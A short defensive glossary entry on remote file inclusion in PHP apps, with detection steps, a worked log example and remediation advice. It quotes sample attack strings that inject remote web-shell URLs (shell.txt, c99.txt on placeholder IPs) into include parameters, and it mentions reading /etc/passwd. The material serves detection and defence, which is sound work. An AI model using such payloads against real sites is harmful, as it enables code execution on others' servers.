Malware
Remote file inclusion
Also called RFI.
Remote file inclusion is a flaw where an app loads and runs a file from a URL the attacker supplies, typically through an include or require fed by user input. The attacker's code runs with your app's rights.
How it is measured
Look for parameters that name a file or page, like ?page= or ?template=, passed into include, require, or similar calls. In PHP the relevant setting is allow_url_include, which should be off. A probe puts an external URL in the parameter and watches for a request arriving at a server you control.
In logs, RFI attempts contain full URLs, often ending in a question mark or a .txt name, such as ?page=http://203.0.113.9/shell.txt?. A 200 response plus an outbound fetch from your server is the confirmation.
Worked example
A club's old PHP site has index.php?section=news. The log shows ?section=http://198.51.100.7/c99.txt? from three IPs in an hour. Outbound logs show the web server fetching c99.txt once, and a new file, images/thumb.php, appears minutes later.
allow_url_include was on because a 2012 plugin needed it. Switching it off and replacing the include with a lookup in a fixed array of allowed section names closes the hole; thumb.php is the leftover that has to be removed.
How it differs
Local file inclusion pulls in a file that already exists on the server, such as /etc/passwd or a log containing the attacker's text. Remote file inclusion fetches the file from outside. RFI hands over code directly; LFI needs some way to get hostile content onto disk first.
Common errors
Blocking the string http in the parameter and missing ftp or data wrappers. Relying on appending .php to the value. Leaving allow_url_include on for old code. Fixing one page and not the other includes that use the same pattern. Removing the shell without finding the parameter.
In practice
Turn allow_url_include off, and replace any dynamic include with a fixed mapping from short keys to files. Search the codebase for include and require calls that touch request input, and grep logs for URLs inside query strings.